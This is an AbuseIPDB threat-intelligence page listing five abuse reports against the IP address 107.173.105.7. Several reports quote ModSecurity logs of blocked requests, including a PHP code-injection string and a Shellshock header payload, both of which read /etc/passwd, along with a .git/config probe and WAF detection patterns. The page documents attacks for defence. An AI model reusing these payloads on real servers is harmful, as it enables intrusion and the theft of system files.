JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 107.173.105.7

107.173.105.7 was found in our database!

This IP was reported 5 times. Confidence of Abuse is 0%: ?

ISP	MPServ
Usage Type	Data Center/Web Hosting/Transit
ASN	AS36352
Hostname(s)	107-173-105-7-host.colocrossing.com
Domain Name	colocrossing.com
Country	🇺🇸 United States of America
City	Buffalo, New York

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 107.173.105.7

Whois 107.173.105.7

IP Abuse Reports for 107.173.105.7:

This IP address has been reported a total of 5 times from 2 distinct sources. 107.173.105.7 was first reported on January 15th 2025, and the most recent report was 5 months ago.

Old Reports: The most recent abuse report for this IP address is from 5 months ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇺🇸 TPI-Abuse	2025-12-29 19:14:13 (5 months ago)	(mod_security) mod_security (id:210492) triggered by 107.173.105.7 (107-173-105-7-host.colocrossing. ... show more (mod_security) mod_security (id:210492) triggered by 107.173.105.7 (107-173-105-7-host.colocrossing.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Dec 29 14:13:25.701570 2025] [security2:error] [pid 31734:tid 31754] [client 107.173.105.7:36669] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "cpanel.kettlehill.com"] [uri "/css../.git/config"] [unique_id "aVLS1WCDVM70TD0LIjvWxgAAAU0"] show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2025-11-13 13:54:55 (7 months ago)	(mod_security) mod_security (id:210350) triggered by 107.173.105.7 (107-173-105-7-host.colocrossing. ... show more (mod_security) mod_security (id:210350) triggered by 107.173.105.7 (107-173-105-7-host.colocrossing.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Nov 13 08:54:49.642334 2025] [security2:error] [pid 13817:tid 13817] [client 107.173.105.7:42701] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(close\|keep-alive),[\\\\t\\\\n\\\\r ]{0,1}(close\|keep-alive)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/12_HTTP_Protocol.conf"] [line "70"] [id "210350"] [rev "1"] [msg "COMODO WAF: Multiple/Conflicting Connection Header Data Found\|\|ftp.nbcnewsradio.com\|F\|4"] [data "keep-alive, close"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] [hostname "ftp.nbcnewsradio.com"] [uri "/mcp"] [unique_id "aRXjKckx-I0DyYPoEXWCgAAAAAk"] show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2025-07-27 02:11:32 (10 months ago)	(mod_security) mod_security (id:211190) triggered by 107.173.105.7 (107-173-105-7-host.colocrossing. ... show more (mod_security) mod_security (id:211190) triggered by 107.173.105.7 (107-173-105-7-host.colocrossing.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat Jul 26 22:11:26.736065 2025] [security2:error] [pid 783496:tid 783522] [client 107.173.105.7:56425] ModSecurity: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt\|\|kettlehill.net\|F\|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "kettlehill.net"] [uri "/fuel/pages/select/"] [unique_id "aIWKzkBIVxi3CeAsEkAE6AAAAVI"] show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2025-05-29 16:24:34 (1 year ago)	(mod_security) mod_security (id:221260) triggered by 107.173.105.7 (107-173-105-7-host.colocrossing. ... show more (mod_security) mod_security (id:221260) triggered by 107.173.105.7 (107-173-105-7-host.colocrossing.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu May 29 12:24:25.120025 2025] [security2:error] [pid 2967886:tid 2967886] [client 107.173.105.7:47011] ModSecurity: Access denied with code 403 (phase 1). Pattern match "^(?:\\\\'\\\\w+?=)?\\\\(\\\\)\\\\s{" at MATCHED_VAR. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "77"] [id "221260"] [rev "3"] [msg "COMODO WAF: Shellshock Command Injection Vulnerabilities in GNU Bash through 4.3 bash43-026 (CVE-2014-7187, CVE-2014-7186, CVE-2014-7169, CVE-2014-6278, CVE-2014-6277, CVE-2014-6271)\|\|www.farmers123.com\|F\|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.farmers123.com"] [uri "/cgi-bin/status"] [unique_id "aDiKOTHgFlblQwTx_1HV2wAAAAY"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd show less	Brute-Force Bad Web Bot Web App Attack
Anonymous	2025-01-15 08:30:23 (1 year ago)	\| Common web attack.	Hacking SQL Injection Web App Attack

Showing 1 to 5 of 5 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇰🇷 211.253.9.49

🇸🇪 171.25.158.74

🇺🇸 107.175.156.151

🇺🇸 91.242.72.85

🇬🇧 87.236.176.202

🇯🇵 45.192.197.86

🇺🇸 23.95.248.117

🇮🇳 210.18.176.239

🇧🇷 168.196.206.14

🇮🇷 151.235.247.75

🇫🇮 147.185.133.92

🇨🇳 124.91.184.46

🇰🇷 121.184.144.232

🇺🇸 107.150.2.13

🇮🇩 103.110.34.131

🇮🇳 74.225.30.8

🇺🇦 46.201.134.247

🇺🇸 45.33.109.18

🇷🇴 2.57.122.177

🇲🇾 203.121.40.210